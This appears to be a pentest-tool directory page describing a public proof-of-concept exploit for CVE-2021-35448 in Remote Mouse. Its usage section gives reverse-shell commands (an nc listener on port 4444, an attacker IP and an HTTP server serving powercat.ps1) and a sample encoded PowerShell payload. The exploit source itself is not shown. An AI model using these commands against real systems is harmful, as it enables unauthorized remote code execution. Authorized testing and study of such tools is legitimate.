Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/goultarde/remotemouse-3.008-rce
Payload GenerationVulnerability AnalysisExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubgoultarde/remotemouse-3.008-rce

RemoteMouse-3.008-RCE

POC for CVE-2021-35448 based on https://www.exploit-db.com/exploits/49601

View Repository
21 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-35448 - Remote Mouse Exploit

Description

This exploit targets the CVE-2021-35448 vulnerability in the Remote Mouse application (formerly WiFi Mouse).

POC

CVE-2021-35448.webm

Usage

Basic Syntax

root@kitploit:~
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]

Options

  • -t, --target: Target IP address (required)
  • -p, --payload: Custom command to execute
  • -r, --reverse: Reverse shell in IP:PORT format
  • -l, --http: Local HTTP server in IP:PORT format (required with -r)
  • Usage Examples

    1. Custom Command

    root@kitploit:~
    python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
    

    2. Reverse Shell (Recommended)

    root@kitploit:~
    # Terminal 1 - Listener
    nc -nlvp 4444
    
    # Terminal 2 - Exploit
    python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
    

    Prerequisites

    Required Files

    • CVE-2021-35448.py: Main exploitation script
    • powercat.ps1: PowerShell script for reverse shells

    Target System

    • Remote Mouse installed and running
    • Windows system (tested on Windows 10)

    Warning

    ⚠️ ETHICAL USE ONLY ⚠️

    This tool is intended for educational purposes and authorized penetration testing only. Unauthorized use of this exploit is illegal and may result in legal prosecution.

    References

    • WiFi Mouse 1.7.8.5 - Remote Code Execution
    • CVE-2021-35448 Detail

    Author

    Developed for educational and ethical penetration testing purposes.


    Last updated: 2025

    Download Tool